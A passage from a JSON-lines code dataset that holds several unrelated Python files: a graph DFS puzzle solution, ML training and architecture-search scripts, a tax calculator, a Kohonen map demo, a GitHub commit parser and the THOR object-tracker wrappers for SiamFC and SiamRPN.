delete(self, uid, pid):\n yield UserPin.delete(uid, pid)\n 
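# nothing to return after a successful delete, so reply 204 No Content\n        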
self.set_status(httplib.NO_CONTENT)\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154718061","text":"#!/bin/python3\n\ndef dfs(graph, start):\n visited = set()\n stack = [start]\n\n while stack:\n vertex = stack.pop()\n if vertex not in visited:\n visited.add(vertex)\n stack.extend(graph[vertex] - visited)\n return visited\n\n\n# main\nq = int(input().strip())\n\nfor a0 in range(q):\n graph = {}\n n, m, c_lib, c_road = map(int, input().strip().split(' '))\n\n for a1 in range(m):\n city_1, city_2 = input().strip().split(' ')\n\n if not graph.get(city_1): graph[city_1] = set()\n if not graph.get(city_2): graph[city_2] = set()\n\n graph[city_1].add(city_2)\n graph[city_2].add(city_1)\n\n if c_lib <= c_road:\n print(n * c_lib)\n continue\n\n cities = set(graph.keys())\n cost = 0\n visited = set()\n non_visited = cities - visited\n\n while non_visited:\n component = dfs(graph, non_visited.pop())\n cost += (len(component) - 1) * c_road + c_lib\n visited |= component\n non_visited = cities - visited\n\n print(cost)","sub_path":"algorithms/graph_theory/roads_and_libraries.py","file_name":"roads_and_libraries.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"155263213","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn import ensemble\r\nfrom sklearn import model_selection\r\nfrom sklearn import metrics\r\n\r\n\r\n# load data\r\ndf = pd.read_csv('E:/data/xc/samples2.csv')\r\nX = df[['x', 'y', 'GEO', 'PLANC', 'PRECI', 'TWI', 'TEMPR', 'SLOPE']]\r\ny = df['SOMB']\r\nX = np.array(X)\r\ny = np.array(y)\r\n\r\nnp.random.seed(314)\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.3)\r\n\r\nnumberList = np.arange(1, 100)\r\nrmseList = []\r\n\r\nfor number in numberList:\r\n# params = {'n_estimators': number, 'max_depth': 4, 'min_samples_split': 2,\r\n# 'learning_rate': 0.01, 'loss': 'ls'}\r\n# clf = ensemble.GradientBoostingRegressor(**params)\r\n clf = ensemble.GradientBoostingRegressor(n_estimators=number)\r\n clf.fit(X_train, y_train)\r\n mse = metrics.mean_squared_error(y_test, clf.predict(X_test))\r\n rmse = np.sqrt(mse)\r\n print(number, ':\\t', rmse)\r\n rmseList.append(rmse)\r\n\r\nplt.scatter(numberList, rmseList)\r\n","sub_path":"boosting.py","file_name":"boosting.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"225081167","text":"import argparse\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom genotypes import PRIMITIVES\nfrom model_search import Network\nfrom torch.autograd import Variable\nfrom collections import namedtuple\n\n\ndef random_alphas(steps):\n k = sum(1 for i in range(steps) for n in range(2 + i))\n num_ops = len(PRIMITIVES)\n alphas_normal = []\n for i in range(steps):\n for n in range(2 + i):\n alphas_normal.append(Variable(torch.randn(1, num_ops).cuda(), requires_grad=True))\n return alphas_normal\n\n\ndef normalize_weights(alphas, steps):\n normal_weights = []\n n = 2\n start = 0\n for _ in range(steps):\n end = start + n\n for j in range(start, end):\n normal_weights.append(F.softmax(alphas[j], dim=-1).data.cpu().numpy())\n start = end\n n += 1\n return normal_weights\n\n\ndef parse(weights, 
steps):\n gene = []\n n = 2\n start = 0\n for i in range(steps):\n end = start + n\n W = weights[start:end].copy()\n edges = sorted(range(i + 2), key=lambda x: -max(W[x][k] for k in range(len(W[x])) if k != PRIMITIVES.index('none')))[:2]\n for j in edges:\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j))\n start = end\n n += 1\n multiplier = 4\n concat = range(2 + steps - multiplier, steps + 2)\n Genotype = namedtuple('Genotype', 'normal normal_concat')\n genotype_normal = Genotype(normal=gene, normal_concat=concat)\n return genotype_normal\n\n\nparser = argparse.ArgumentParser(\"modelnet\")\nparser.add_argument('--n_steps', type=int, default=3, help='total number of layers in one cell')\nparser.add_argument('--n_classes', type=int, default=121, help='total number of classes')\nparser.add_argument('--init_channels', type=int, default=32, help='num of init channels')\nparser.add_argument('--in_channels', type=int, default=50, help='num of init channels')\nparser.add_argument('--num_cells', type=int, default=1, help='total number of cells')\nparser.add_argument('--n_archs', type=int, default=1, help='Number of random architectures to output')\n\nargs = parser.parse_args()\n\ncriterion = torch.nn.BCEWithLogitsLoss().cuda()\nmodel = Network(args.init_channels, args.n_classes, args.num_cells, criterion,\n args.n_steps, in_channels=args.in_channels).cuda()\nalphas_normal = torch.cat(model.alphas_normal, dim=0)\n\nnum_opts = len(PRIMITIVES)\nopt_random_idx = np.random.randint(0, num_opts - 1, 2 * args.n_steps)\nconnection_random_idx = np.random.randint(0, args.n_steps, 2 * args.n_steps)\nfor i in range(args.n_archs):\n alphas_normal = random_alphas(args.n_steps)\n normal_weights = normalize_weights(alphas_normal, args.n_steps)\n gene_normal = parse(np.concatenate(normal_weights, axis=0), args.n_steps)\n\n print(gene_normal)\n","sub_path":"gcn/gcn_point/random_search.py","file_name":"random_search.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"417115515","text":"\"\"\"Exercise 1\n\nUsage:\n\n$ CUDA_VISIBLE_DEVICES=2 python practico_1_train_petfinder.py --dataset_dir ../ --epochs 30 --dropout 0.1 0.1 --hidden_layer_sizes 200 100\n\nTo know which GPU to use, you can check it with the command\n\n$ nvidia-smi\n\"\"\"\n\nimport argparse\n\nimport os\nimport mlflow\nimport numpy\nimport pandas\nimport tensorflow as tf\n\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import layers, models\nfrom sklearn.utils import shuffle\nfrom itertools import zip_longest\n\nTARGET_COL = 'AdoptionSpeed'\n\n\ndef read_args():\n parser = argparse.ArgumentParser(\n description='Training a MLP on the petfinder dataset')\n # Here you have some examples of classifier parameters. 
You can add\n # more arguments or change these if you need to.\n parser.add_argument('--dataset_dir', default='./', type=str,\n help='Directory with the training and test files.')\n parser.add_argument('--hidden_layer_sizes', nargs='+', default=[100], type=int,\n help='Number of hidden units of each hidden layer.')\n parser.add_argument('--epochs', default=10, type=int,\n help='Number of epochs to train.')\n parser.add_argument('--dropout', nargs='+', default=[0.5], type=float,\n help='Dropout ratio for every layer.')\n parser.add_argument('--batch_size', type=int, default=32,\n help='Number of instances in each batch.')\n parser.add_argument('--experiment_name', type=str, default='Base model',\n help='Name of the experiment, used in mlflow.')\n parser.add_argument('--one_hot_columns', nargs='+', type=str, default=['Gender', 'Color1'],\n help='Name of column to be one hot encoded.')\n parser.add_argument('--embedding_columns', nargs='+', type=str, default=['Breed1'],\n help='Name of columns to be embedded.')\n args = parser.parse_args()\n\n assert len(args.hidden_layer_sizes) == len(args.dropout)\n return args\n\n\ndef process_features(df, one_hot_columns, numeric_columns, embedded_columns, test=False):\n direct_features = []\n\n # Create one hot encodings\n for one_hot_col, max_value in one_hot_columns.items():\n direct_features.append(tf.keras.utils.to_categorical(df[one_hot_col] - 1, max_value))\n\n # Create and append numeric columns\n\n for numeric_column in numeric_columns:\n direct_features.append(tf.keras.utils.normalize(df[numeric_column].values.reshape(-1,1)))\n \n features = {'direct_features': numpy.hstack(direct_features)}\n\n # Create embedding columns - nothing to do here. We will use the zero embedding for OOV\n for embedded_col in embedded_columns.keys():\n features[embedded_col] = df[embedded_col].values\n\n if not test:\n nlabels = df[TARGET_COL].unique().shape[0]\n # Convert labels to one-hot encodings\n targets = tf.keras.utils.to_categorical(df[TARGET_COL], nlabels)\n else:\n targets = None\n\n return features, targets\n\n\ndef load_dataset(dataset_dir, batch_size):\n # Read train dataset (and maybe dev, if you need to...)\n dataset, dev_dataset = train_test_split(\n pandas.read_csv(os.path.join(dataset_dir, 'train.csv')), test_size=0.2)\n\n test_dataset = pandas.read_csv(os.path.join(dataset_dir, 'test.csv'))\n\n print('Training samples {}, test_samples {}'.format(\n dataset.shape[0], test_dataset.shape[0]))\n\n return dataset, dev_dataset, test_dataset\n\n\ndef build_model(embedded_columns, direct_features_input, direct_features_input_shape,\n hidden_layer_sizes, dropouts, n_labels):\n tf.keras.backend.clear_session()\n\n embedding_layers = []\n inputs = []\n for embedded_col, max_value in embedded_columns.items():\n input_layer = layers.Input(shape=(1,), name=embedded_col)\n inputs.append(input_layer)\n embedding_size = int(max_value / 4)\n embedding_layers.append(\n tf.squeeze(layers.Embedding(input_dim=max_value, output_dim=embedding_size)(input_layer), axis=-2))\n print('Adding embedding of size {} for layer {}'.format(embedding_size, embedded_col))\n\n direct_features_input = layers.Input(shape=direct_features_input_shape, name='direct_features')\n inputs.append(direct_features_input)\n\n features = layers.concatenate(embedding_layers + [direct_features_input])\n\n if len(hidden_layer_sizes) > 0:\n hidden_layer_size = hidden_layer_sizes.pop(0)\n last_hidden_layer = layers.Dense(hidden_layer_size, activation='relu')(features)\n if len(dropouts) > 0:\n dropout = 
dropouts.pop(0)\n last_hidden_layer = layers.Dropout(dropout)(last_hidden_layer)\n \n if len(dropouts) > len(hidden_layer_sizes):\n dropouts = dropouts[:len(hidden_layer_sizes)]\n \n for hidden_layer_size, dropout in zip_longest(hidden_layer_sizes, dropouts, fillvalue=None):\n if hidden_layer_size != None:\n last_hidden_layer = layers.Dense(hidden_layer_size, activation='relu')(last_hidden_layer)\n if dropout != None:\n last_hidden_layer = layers.Dropout(dropout)(last_hidden_layer)\n \n output_layer = layers.Dense(n_labels, activation='softmax')(last_hidden_layer)\n return models.Model(inputs=inputs, outputs=output_layer)\n\n\ndef main():\n args = read_args()\n dataset, dev_dataset, test_dataset = load_dataset(args.dataset_dir, args.batch_size)\n nlabels = dataset[TARGET_COL].unique().shape[0]\n \n one_hot_columns = {\n one_hot_col: dataset[one_hot_col].max()\n for one_hot_col in args.one_hot_columns\n }\n embedded_columns = {\n embedded_col: dataset[embedded_col].max() + 1\n for embedded_col in args.embedding_columns\n }\n numeric_columns = ['Age', 'Fee']\n\n dataset = shuffle(dataset, random_state=12345)\n \n X_train, y_train = process_features(dataset, one_hot_columns, numeric_columns, embedded_columns)\n direct_features_input_shape = (X_train['direct_features'].shape[1],)\n X_dev, y_dev = process_features(dev_dataset, one_hot_columns, numeric_columns, embedded_columns)\n \n batch_size = args.batch_size\n\n train_ds = tf.data.Dataset.from_tensor_slices((X_train, y_train)).batch(batch_size)\n dev_ds = tf.data.Dataset.from_tensor_slices((X_dev, y_dev)).batch(batch_size)\n X_test, y_test = process_features(\n test_dataset, one_hot_columns, numeric_columns, embedded_columns, test=True)\n test_ds = tf.data.Dataset.from_tensor_slices(X_test).batch(batch_size)\n\n model = build_model(embedded_columns, X_train['direct_features'], direct_features_input_shape, \n args.hidden_layer_sizes,\n args.dropout,\n nlabels)\n\n model.compile(loss='categorical_crossentropy', \n optimizer='adam',metrics=['accuracy'])\n\n print(model.summary())\n\n mlflow.set_experiment(args.experiment_name)\n\n with mlflow.start_run(nested=True):\n mlflow.log_param('hidden_layer_sizes', args.hidden_layer_sizes)\n mlflow.log_param('dropout', args.dropout)\n mlflow.log_param('embedded_columns', embedded_columns)\n mlflow.log_param('one_hot_columns', one_hot_columns)\n mlflow.log_param('numeric_columns', numeric_columns)\n mlflow.log_param('epochs', args.epochs)\n\n history = model.fit(train_ds, epochs=args.epochs, validation_data=dev_ds, verbose=0)\n\n print(history.history.keys())\n\n\n loss, accuracy = 0, 0\n loss, accuracy = model.evaluate(dev_ds)\n print(\"*** Dev loss: {} - accuracy: {}\".format(loss, accuracy))\n mlflow.log_metric('dev_loss', loss)\n mlflow.log_metric('dev_accuracy', accuracy)\n \n predictions = 'No prediction yet'\n predictions = model.predict(test_ds)\n\n test_dataset[\"AdoptionSpeed\"] = predictions.argmax(axis=1)\n test_dataset.to_csv(\"./submission.csv\", index=False, columns=[\"PID\", \"AdoptionSpeed\"])\n print(predictions)\n\n \nprint('All operations completed')\n\n\nprint('All operations completed')\n\nif __name__ == '__main__':\n main()\n","sub_path":"practico_1_train_petfinder.py","file_name":"practico_1_train_petfinder.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"189094769","text":"\"\"\"\r\nCalculate the total to charge for an order from an online store in 
Canada\r\n\"\"\"\r\ncountryName=input(\"What country are you from? (enter in capital letters only) : \")\r\ntotalAmount=float(input(\"What is your total order amount? : \"))\r\nif not countryName ==\"CANADA\":\r\n print(\"Total amount with taxes is\", totalAmount)\r\nif countryName == \"CANADA\":\r\n province = input(\"What is your province from Canada? (Enter in capital letters only) \")\r\n if province == \"ALBERTA\" :\r\n print(\"Total amount with taxes is\", totalAmount+(0.05*totalAmount))\r\n elif province == \"ONTARIO\" or province ==\"NEW BRUNSWICK\" or province ==\"NOVA SCOTIA\":\r\n print(\"Total amount with taxes is\",totalAmount+(0.13*totalAmount))\r\n else:\r\n print(\"Total amount with taxes is\" ,totalAmount + (0.11 * totalAmount))\r\n","sub_path":"TaxCharges_on_order.py","file_name":"TaxCharges_on_order.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"309375946","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random as ran\nimport pandas as pd\nimport math\nimport csv\n\n# Vector 2D\nclass Vector2:\n x = 0\n y = 0\n def __init__(self, x_a, y_a):\n self.x = x_a\n self.y = y_a\n def values(self):\n print(\"(\" + str(self.x) + \", \" + str(self.y) + \")\")\n @staticmethod\n def distance(vA, vB):\n dist = math.sqrt(pow((vA.x - vB.x), 2) + pow((vA.y - vB.y), 2))\n return dist\n\n# Inputting from Files\n# Neurons\nneuronPoints = []\nneuronsCSVPath = 'neurons.csv'\ndef neuronsCSVParse():\n data = pd.read_csv(neuronsCSVPath, names=['age', 'cp'])\n records = data.to_dict(orient='record')\n for row in records:\n neuronPoints.append(Vector2(row['age'], row['cp']))\n for point in neuronPoints:\n point.values()\n# Vectors\nvectors = []\nvectorsCSVPath = 'vectors.csv'\ndef vectorsCSVParse():\n data = pd.read_csv(vectorsCSVPath, names=['w_age', 'w_cp'])\n records = data.to_dict(orient='record')\n for row in records:\n vectors.append(Vector2(row['w_age'], row['w_cp']))\n for vector in vectors:\n vector.values()\n\n# Plot Points on the Map\ndef draw(points):\n for point in points:\n plt.scatter(point.x, point.y)\n plt.show()\n\n# Changing Weight and Overriding the old Vectors\nalpha = 0.4\ndef changedVector(neuron: Vector2, winner: Vector2):\n x = neuron.x + alpha * (winner.x - neuron.x)\n y = neuron.y + alpha * (winner.y - neuron.y)\n newNeuron = Vector2(x, y)\n newNeuron.values()\n return newNeuron\n\n# Applying Algorithms\nresult = []\ndef calculate():\n result = neuronPoints\n # Loop for n times\n numLoops = int(input(\"How many Iterations? \"))\n for i in range(0, numLoops):\n print(\"Iteration \" + str(i + 1) + \"... 
\")\n # Compare the distance from each neuron to each input\n for j in range(0, len(result)):\n # Smallest distance input => winner\n smallestDist = Vector2.distance(vectors[0], result[j])\n currentWinner = vectors[0]\n # One neuron for 3 inputs\n for i in range(1, len(vectors)):\n comparingDist = Vector2.distance(vectors[i], result[j])\n if comparingDist < smallestDist:\n smallestDist = comparingDist\n currentWinner = vectors[i]\n # Change weight\n result[j] = changedVector(result[j], currentWinner)\n draw(result)\n\n# MAIN\ndef main():\n neuronsCSVParse()\n draw(neuronPoints)\n vectorsCSVParse()\n draw(vectors)\n calculate()\n\nmain()\n","sub_path":"kohonen.py","file_name":"kohonen.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"42948191","text":"import sys\nimport json\nimport re\ninputFileName = \"logCommit.txt\"\n\nif len(sys.argv) >=2:\n inputFileName = sys.argv[1]\n\nf = open(inputFileName)\njsonData = json.load(sys.stdin)\nf.close()\n\nitems = jsonData[\"items\"]\nprint(\"items:\" + str(len(items)) )\nfor item in items:\n commit = item[\"commit\"]\n commitMessage = commit[\"message\"]\n urls = re.findall('(?:https?:\\/\\/|)[^\\s ]+\\/[0-9a-zA-Z]*' , commitMessage)\n for url in urls:\n print(url)\n","sub_path":"siteSearch/githubSearch/commitDigest.py","file_name":"commitDigest.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"633139422","text":"# --------------------------------------------------------\n# THOR\n# Licensed under The MIT License\n# Written by Axel Sauer (axel.sauer@tum.de)\n# --------------------------------------------------------\n\nimport abc\nfrom types import SimpleNamespace\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport cv2\nfrom scipy.signal import tukey\n\nfrom .utils import *\nfrom .modules import ST_Module, LT_Module, Dummy_Module\n\nMEDIATE_SIZE = 255\n\nclass THOR_Wrapper():\n    def __init__(self, cfg, net):\n        use_cuda = torch.cuda.is_available()\n        self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n        self._cfg = SimpleNamespace(**cfg)\n\n        self._mem_len_total = self._cfg.K_st + self._cfg.K_lt\n        assert self._cfg.K_lt > 0\n\n        self.do_full_init = True\n        self._net = net\n        self._curr_type = 'lt'\n        self.score_viz = None\n        self.template_keys = ['im', 'raw', 'kernel', 'compare']\n\n    def setup(self, im, pos, sz):\n        \"\"\"\n        initialize the short-term and long-term module\n        \"\"\"\n        self.avg_chans = np.mean(im, axis=(0, 1))\n        self._frame_no = 0\n\n        # make the template\n        crop = self._get_crop(im, pos, sz)\n        temp = self._make_template(crop)\n\n        # initialize the short term module\n        if self._cfg.K_st:\n            self.st_module = ST_Module(K=self._cfg.K_st, template_keys=self.template_keys,\n                                       calc_div=(self._cfg.lb_type=='dynamic'),\n                                       verbose=self._cfg.verbose, viz=self._cfg.viz)\n        else:\n            self.st_module = Dummy_Module(self.template_keys)\n        self.st_module.fill(temp)\n\n        # initialize the long term module\n        if self.do_full_init or self._cfg.vanilla:\n            self.lt_module = LT_Module(K=self._cfg.K_lt, template_keys=self.template_keys,\n                                       lb=self._cfg.lb, lb_type=self._cfg.lb_type,\n                                       verbose=self._cfg.verbose, viz=self._cfg.viz)\n            self.lt_module.fill(temp)\n            self.do_full_init = False\n        else:\n            # reinitialize long term only at the beginning of the episode\n            self.lt_module.update(temp, div_scale=0)\n\n    def update(self, im, curr_crop, pos, sz):\n        \"\"\"\n        update the 
short-term and long-term module and\n        update the shown templates and activations (score_viz)\n        \"\"\"\n        self._frame_no += 1\n\n        # only update according to dilation steps\n        if not self._frame_no%self._cfg.dilation:\n            crop = self._get_crop(im, pos, sz)\n            temp = self.crop_to_mem(crop)\n\n            # reset st if it drifted\n            if self._cfg.K_st and self._curr_type=='lt':\n                self.st_module.fill(temp)\n\n        if self._cfg.viz:\n            self._show_modulate(torch_to_img(curr_crop), self.score_viz)\n            self._show_templates('st')\n            self._show_templates('lt')\n\n    def crop_to_mem(self, crop):\n        \"\"\"\n        make the template and insert into modules\n        \"\"\"\n        temp = self._make_template(crop)\n\n        # temp to st and lt module\n        div_scale = self.st_module.update(temp)\n        if self._cfg.K_lt > 1:\n            self.lt_module.update(temp, div_scale=div_scale)\n\n        return temp\n\n    def _get_best_temp(self, pos, sz, score):\n        \"\"\"\n        determine the best template and return the prediction and the\n        score of the best long-term template\n        \"\"\"\n        # get the best score in st and lt memory\n        score_st, score_lt = np.split(score, [self._cfg.K_st])\n        best_st = [] if not len(score_st) else np.argmax(score_st)\n        best_lt = np.argmax(score_lt) + self._cfg.K_st\n\n        # calculate iou and switch to lt if iou too low\n        iou = self.get_IoU(pos.T[best_st], sz.T[best_st], pos.T[best_lt], sz.T[best_lt])\n        self._curr_type = 'lt' if iou < self._cfg.iou_tresh else 'st'\n\n        return (best_lt if self._curr_type=='lt' else best_st), score[best_lt]\n\n    def _show_templates(self, mode='lt'):\n        if mode=='st' and not self._cfg.K_st: return\n        mem = self.st_module if mode=='st' else self.lt_module\n        y_plot = 50 if mode=='st' else 300\n\n        temp_canvas = mem.canvas.copy()\n        cv2.imshow(f\"Templates {mode}\", temp_canvas)\n        cv2.moveWindow(f\"Templates {mode}\", 1200, y_plot)\n\n    @staticmethod\n    def get_IoU(pos_1, sz_1, pos_2, sz_2):\n        if not len(pos_1): return 0.0 # st memory is empty\n        if not len(pos_2): return 1.0 # lt memory is empty\n        return IOU_numpy(xywh_to_xyxy(np.append(pos_1, sz_1)), \\\n                         xywh_to_xyxy(np.append(pos_2, sz_2)))\n\n    @staticmethod\n    def modulate(score, mem_len, out_sz):\n        \"\"\"\n        modulate the prediction of each template with a mean activation map of all templates\n        \"\"\"\n        score_per_temp = int(np.prod(score.shape) / (mem_len * np.prod(out_sz)))\n        score_im = score.reshape(mem_len, score_per_temp, *out_sz)\n        score_mean = np.mean(score_im, axis=1)\n\n        #modulation according to score:\n        weights = np.max(score_mean, axis=(1, 2))\n        weights = weights.reshape(len(weights), 1, 1)\n        score_mean *= weights\n        # modulate the mean with the weights\n        score_mean_all = np.mean(score_mean, axis=0).reshape(1, *out_sz)\n        score_mean_norm = score_mean_all/np.max(score_mean_all)\n\n        # modulate: multiply with the mean\n        mean_tiled = np.tile(score_mean_norm.reshape(1, -1), score_per_temp)\n        score = score*mean_tiled\n        return score, score_mean_norm\n\n    @staticmethod\n    def _show_modulate(im, score_viz):\n        \"\"\"\n        show the current activations on top of the current crop\n        \"\"\"\n        if score_viz is None: return # modulation is not active\n\n        im = cv2.resize(im, (MEDIATE_SIZE, MEDIATE_SIZE)).astype(np.uint8)\n        canvas = np.zeros([im.shape[0], im.shape[1], 3], dtype=np.uint8)\n\n        # calculate the color map\n        score_im_base = cv2.resize(score_viz[0], im.shape[:2])\n        score_im_base = (255*score_im_base).astype(np.uint8)\n        im_color = cv2.applyColorMap(score_im_base, cv2.COLORMAP_JET)\n\n        # show the image\n        overlayed_im = cv2.addWeighted(im, 0.8, im_color, 0.7, 0)\n        canvas[:, :im.shape[1], :] = overlayed_im\n        
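# display the overlayed crop in a separate OpenCV window\n        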
cv2.imshow('modulated', canvas)\n cv2.moveWindow('modulated', 1200, 800)\n\n @abc.abstractmethod\n def custom_forward(self, x):\n \"\"\"\n implements the forward pass through the network of the tracker\n with an added batch dimension [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\n @abc.abstractmethod\n def _get_crop(self, im, pos, sz):\n \"\"\"\n get the crop from the search window [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\n @abc.abstractmethod\n def _make_template(self, crop):\n \"\"\"\n given a crop, make a template [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\n @abc.abstractmethod\n def batch_evaluate(self, crop):\n \"\"\"\n take evalue method from original tracker and add batch processing for all\n templates in memory and add modulating [tracker specific]\n \"\"\"\n raise NotImplementedError(\"Must be implemented in subclass.\")\n\nclass THOR_SiamFC(THOR_Wrapper):\n def __init__(self, cfg, net):\n super(THOR_SiamFC, self).__init__(cfg, net)\n self.template_sz = 127\n self.kernel_sz = 6\n self.max_response = 0\n\n def _get_crop(self, im, pos, sz):\n context_sz = self._cfg.context_temp * np.sum(sz)\n crop = get_subwindow_tracking_SiamFC(im=im, pos=pos, model_sz=self.template_sz,\n context_sz=context_sz, avg_chans=self.avg_chans,\n target_sz=sz)\n return crop.unsqueeze(0)\n\n def _make_template(self, crop):\n temp = {}\n temp['raw'] = crop.to(self.device)\n temp['im'] = torch_to_img(crop)\n temp['kernel'] = self._net.feature(temp['raw'])\n\n # add the tukey window to the temp for comparison\n alpha = self._cfg.tukey_alpha\n win = np.outer(tukey(self.kernel_sz, alpha), tukey(self.kernel_sz, alpha))\n temp['compare'] = temp['kernel'] * torch.Tensor(win).to(self.device)\n return temp\n\n def custom_forward(self, x):\n x_f = self._net.feature(x) # 3 x 256 x 22 x 22\n kernel_cat = torch.cat(list(self.st_module.templates['kernel']) + \\\n list(self.lt_module.templates['kernel'])) # mem_len x 256 x 22 x 22\n\n # convolve\n out = F.conv2d(x_f, kernel_cat).permute(1, 0, 2, 3) # mem_len x 3 x 17 x 17\n\n # adjust the scale of the responses\n return out * 0.001\n\n def batch_evaluate(self, crop, old_pos, old_sz, p):\n # get responses\n responses = self.custom_forward(crop)\n responses = responses.data.cpu().numpy()\n batch_sz, scales = responses.shape[:2]\n\n\n # upscale\n upscale = lambda im: cv2.resize(im, (p.upscale_sz, p.upscale_sz),\n interpolation=cv2.INTER_CUBIC)\n responses = np.array([[upscale(responses[t, s]) for s in range(scales)] for t in range(batch_sz)])\n\n responses[:, :p.scale_num // 2] *= p.penalty_k\n responses[:, p.scale_num // 2 + 1:] *= p.penalty_k\n\n # get peak scale for every template\n scale_ids = np.argmax(np.amax(responses, axis=(2, 3)), axis=1)\n\n # apply penalty\n responses = responses[np.arange(batch_sz), scale_ids, :, :]\n responses -= np.min(responses, axis=(1,2)).reshape(-1,1,1)\n responses /= np.sum(responses, axis=(1,2)).reshape(-1,1,1)+ 1e-16\n responses = (1 - p.window_influence) * responses + \\\n p.window_influence * p.hann_window\n\n # mediating\n if self._cfg.modulate:\n old_shape = responses.shape\n responses = responses.reshape(batch_sz, -1)\n responses, self.score_viz = self.modulate(responses, self._mem_len_total, old_shape[-2:])\n responses = responses.reshape(*old_shape)\n\n # get the peak idcs\n get_peak_idx = lambda x: np.unravel_index(x.argmax(), x.shape)\n locs = [get_peak_idx(t) for t in 
responses]\n\n # locate target center\n disp_in_response = np.array(locs) - p.upscale_sz // 2\n disp_in_instance = disp_in_response * \\\n p.total_stride / p.response_up\n disp_in_image = disp_in_instance * p.x_sz * \\\n p.scale_factors[scale_ids].reshape(-1, 1) / p.instance_sz\n target_pos = old_pos + disp_in_image\n\n # update target size\n scale = (1 - p.lr) * 1.0 + \\\n p.lr * p.scale_factors[scale_ids].reshape(-1, 1)\n target_sz = old_sz*scale\n\n # normalize the scores to the score of the initial frame\n best_scores = np.max(responses, axis=(1,2))\n if not self.max_response:\n self.max_response = best_scores[0]\n best_scores = np.ones_like(best_scores)\n else:\n best_scores /= self.max_response\n best_scores = np.clip(best_scores, 0, 1)\n\n # determine the currently best template\n best_temp, lt_score = self._get_best_temp(target_pos.T, target_sz.T, best_scores)\n return target_pos[best_temp], target_sz[best_temp], lt_score, scale[best_temp]\n\nclass THOR_SiamRPN(THOR_Wrapper):\n def __init__(self, cfg, net):\n super(THOR_SiamRPN, self).__init__(cfg, net)\n self.template_sz = 127\n self.kernel_sz = 6\n self.template_keys += ['reg', 'cls', 'reg_anc', 'cls_anc']\n self.curr_temp = None\n\n def _get_crop(self, im, pos, sz):\n wc_z = sz[0] + self._cfg.context_temp * sum(sz)\n hc_z = sz[1] + self._cfg.context_temp * sum(sz)\n context_size = round(np.sqrt(wc_z * hc_z))\n\n crop = get_subwindow_tracking_SiamRPN(im=im, pos=pos, model_sz=self.template_sz,\n original_sz=context_size,\n avg_chans=self.avg_chans)\n return crop.unsqueeze(0)\n\n def _make_template(self, crop):\n temp = {}\n temp['raw'] = crop.to(self.device)\n temp['im'] = torch_to_img(crop)\n\n temp['kernel'] = self._net.featureExtract(temp['raw'])\n temp['reg'] = self._net.conv_r1(temp['kernel'])\n temp['cls'] = self._net.conv_cls1(temp['kernel'])\n t_s = temp['reg'].data.size()[-1]\n\n temp['reg_anc'] = temp['reg'].view(self._net.anchor*4, self._net.feature_out, t_s, t_s)\n temp['cls_anc'] = temp['cls'].view(self._net.anchor*2, self._net.feature_out, t_s, t_s)\n\n # add the tukey window to the temp for comparison\n alpha = self._cfg.tukey_alpha\n win = np.outer(tukey(self.kernel_sz, alpha), tukey(self.kernel_sz, alpha))\n temp['compare'] = temp['kernel'] * torch.Tensor(win).to(self.device)\n return temp\n\n def custom_forward(self, x):\n x_f = self._net.featureExtract(x)\n\n def reg_branch(x, reg_cat, l):\n out = F.conv2d(x, reg_cat)\n out = out.view(l, out.shape[1]//l, out.shape[2], out.shape[3])\n return out\n\n def cls_branch(x, cls_cat, l):\n out = F.conv2d(x, cls_cat)\n return out.view(l, out.shape[1]//l, out.shape[2], out.shape[3])\n\n # regression\n x_reg = self._net.conv_r2(x_f)\n reg_cat = torch.cat(list(self.st_module.templates['reg_anc']) + \\\n list(self.lt_module.templates['reg_anc']))\n reg_res = reg_branch(x_reg, reg_cat, self._mem_len_total)\n reg_res = self._net.regress_adjust(reg_res)\n\n # classification\n x_cls = self._net.conv_cls2(x_f)\n cls_cat = torch.cat(list(self.st_module.templates['cls_anc']) + \\\n list(self.lt_module.templates['cls_anc']))\n cls_res = cls_branch(x_cls, cls_cat, self._mem_len_total)\n\n return reg_res, cls_res, x_f\n\n def batch_evaluate(self, crop, pos, size, window, scale_z, p):\n \"\"\"\n adapted from SiamRPNs tracker_evaluate\n \"\"\"\n delta, score, x_f = self.custom_forward(crop)\n out_sz = score.shape[-2:]\n batch_sz = self._mem_len_total\n\n delta = delta.contiguous().view(batch_sz, 4, -1).data.cpu().numpy()\n score = F.softmax(score.contiguous().view(batch_sz, 2, -1), 
